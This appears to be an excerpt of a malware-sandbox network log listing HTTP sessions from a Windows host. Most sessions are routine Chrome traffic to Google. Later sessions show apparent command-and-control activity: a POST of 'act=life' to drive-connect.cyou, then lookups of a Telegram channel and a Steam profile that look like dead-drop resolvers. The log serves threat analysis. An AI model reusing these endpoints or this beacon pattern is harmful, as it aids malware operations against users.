2024-12-14 11:56:43 UTC	1390	IN	Data Raw: 39 32 38 0d 0a 74 42 51 55 5a 33 51 55 64 57 64 30 46 45 52 6e 6c 7a 61 57 78 33 51 55 46 47 52 55 46 42 52 6c 41 7a 4b 31 42 72 51 55 68 47 65 57 4a 6d 62 48 64 42 52 6c 5a 35 61 47 64 73 65 48 52 59 56 6e 64 42 52 56 5a 33 51 55 46 46 52 46 55 78 64 44 4a 43 59 54 46 34 52 56 46 73 65 56 64 6c 62 48 6c 50 5a 45 5a 35 4e 6d 74 57 56 47 34 32 5a 54 45 34 59 55 5a 35 4d 32 74 73 65 57 39 79 54 48 68 56 56 45 5a 34 57 56 6c 5a 55 6d 52 56 62 48 6c 57 62 58 45 30 61 30 78 73 65 47 31 58 52 6e 68 4e 55 6a 46 33 63 55 31 73 64 33 70 4f 4d 58 63 72 55 32 35 55 53 58 6b 35 55 32 56 76 63 6c 49 30 5a 6a 56 74 52 6d 6c 78 53 54 56 50 4d 58 64 52 53 6c 5a 33 4d 56 46 58 4e 57 31 69 4e 44 42 6a 54 47 31 55 53 6e 4e 61 53 47 38 30 64 48 4a 57 65 44 64 58 53 57 45 77 Data Ascii: 928tBQUZ3QUdWd0FERnlzaWx3QUFGRUFBRlAzK1BrQUhGeWJmbHdBRlZ5aGdseHRYVndBRVZ3QUFFRFUxdDJCYTF4RVFseVdlbHlPZEZ5NmtWVG42ZTE4YUZ5M2tseW9yTHhVVEZ4WVlZUmRVbHlWbXE0a0xseG1XRnhNUjF3cU1sd3pOMXcrU25USXk5U2VvclI0ZjVtRmlxSTVPMXdRSlZ3MVFXNW1iNDBjTG1USnNaSG80dHJWeDdXSWEw
2024-12-14 11:56:43 UTC	961	IN	Data Raw: 78 55 6d 4e 56 52 33 46 68 63 47 78 70 57 6a 52 77 4e 6e 6c 6b 5a 6d 67 32 4d 30 39 72 63 6b 74 4e 54 47 78 79 4e 31 4a 6f 65 48 41 33 63 6b 68 68 65 47 70 4e 51 33 56 43 51 33 46 56 5a 32 56 73 63 46 6c 4a 52 6a 68 45 64 79 38 35 54 33 52 32 62 6e 45 35 55 45 35 6d 4b 7a 4a 5a 54 45 5a 68 64 48 6c 32 54 33 56 77 4d 47 64 33 63 48 68 51 59 6c 41 79 65 58 70 4d 64 47 74 4d 51 6d 74 75 55 44 68 6d 4e 55 5a 73 4f 57 59 32 5a 46 67 72 62 54 68 75 57 55 78 55 4d 48 6c 75 55 32 56 59 55 6d 46 46 55 32 74 42 57 54 4e 74 4d 48 70 75 54 6d 46 44 4d 46 4a 32 5a 30 6b 35 61 6c 52 33 53 46 67 72 61 48 6c 52 65 6d 35 68 62 55 63 77 51 6d 31 6b 55 58 63 34 57 48 42 54 64 45 74 33 56 6b 74 43 64 57 6c 71 55 32 4a 47 53 32 35 6f 53 54 46 50 59 6a 4e 30 65 54 64 4c 4e 44 Data Ascii: xUmNVR3FhcGxpWjRwNnlkZmg2M09rcktNTGxyN1JoeHA3ckhheGpNQ3VCQ3FVZ2VscFlJRjhEdy85T3R2bnE5UE5mKzJZTEZhdHl2T3VwMGd3cHhQYlAyeXpMdGtMQmtuUDhmNUZsOWY2ZFgrbThuWUxUMHluU2VYUmFFU2tBWTNtMHpuTmFDMFJ2Z0k5alR3SFgraHlRem5hbUcwQm1kUXc4WHBTdEt3VktCdWlqU2JGS25oSTFPYjN0eTdLND
2024-12-14 11:56:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49863	142.250.181.132	443	1992	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:56:42 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49864	142.250.181.132	443	1992	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:56:42 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 11:56:43 UTC	1018	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 14 Dec 2024 11:56:42 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 11:56:43 UTC	372	IN	Data Raw: 31 38 32 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 182d)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-14 11:56:43 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-14 11:56:43 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-14 11:56:43 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-14 11:56:43 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-14 11:56:43 UTC	265	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 36 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700326,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u
2024-12-14 11:56:43 UTC	219	IN	Data Raw: 64 35 0d 0a 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 43 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 0d 0a Data Ascii: d5;\ntry{\n_.Cd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.Cd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener
2024-12-14 11:56:43 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 44 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 45 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 44 64 5c Data Ascii: 8000?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar Dd\u003ddocument.querySelector(\".gb_I .gb_A\"),Ed\u003ddocument.querySelector(\"#gb.gb_Rc\");Dd\
2024-12-14 11:56:43 UTC	1390	IN	Data Raw: 4b 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 51 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 51 64 28 5f 2e 4d 64 3f 5f 2e 4d 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 56 64 2c 69 65 2c 55 64 2c 57 64 2c 61 65 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 Data Ascii: Kd(a\u003d\u003e/^[^:]*([/?#]\|$)/.test(a))];_.Qd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Rd\u003dnew _.Qd(_.Md?_.Md.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Vd,ie,Ud,Wd,ae;_.Sd\u003dfunction(a){return a
2024-12-14 11:56:43 UTC	1390	IN	Data Raw: 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 66 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 75 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 67 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 54 64 28 5f 2e 4c 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 53 64 Data Ascii: return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.fe\u003dfunction(a,b,c){return _.ub(a,b,c,!1)!\u003d\u003dvoid 0};_.ge\u003dfunction(a,b){return _.Td(_.Lc(a,b))};_.S\u003dfunction(a,b){return _.Sd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49865	142.250.181.132	443	1992	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:56:42 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 11:56:43 UTC	933	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 14 Dec 2024 11:56:42 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 11:56:43 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-14 11:56:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49941	104.21.79.7	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:01 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drive-connect.cyou
2024-12-14 11:57:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 11:57:02 UTC	1013	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4asrv5ita3poiscbi3st8gsvav; expires=Wed, 09-Apr-2025 05:43:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SF2sTIUDvD19M0ceFFFtXLh4Ub61kaNb5v1DCsCITSD2g1mPwzwPaVkmpr%2B66eYf2QCERrAYwtYafJFOS92AOIlOP81BPi4SmH9MvXydVil7PpXdjeAspxkE4XVjeldOc%2Fl2GsM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e0395faa317ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1607&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1746411&cwnd=171&unsent_bytes=0&cid=90882f33abe99dff&ts=743&x=0"
2024-12-14 11:57:02 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 11:57:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49950	149.154.167.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:05 UTC	86	OUT	GET /detct0r HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:06 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 14 Dec 2024 11:57:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12314 Connection: close Set-Cookie: stel_ssid=95fa6ad80dce6f1165_3592083037608637190; expires=Sun, 15 Dec 2024 11:57:05 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-14 11:57:06 UTC	12314	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49953	23.55.153.106	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:06 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 11:57:06 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT 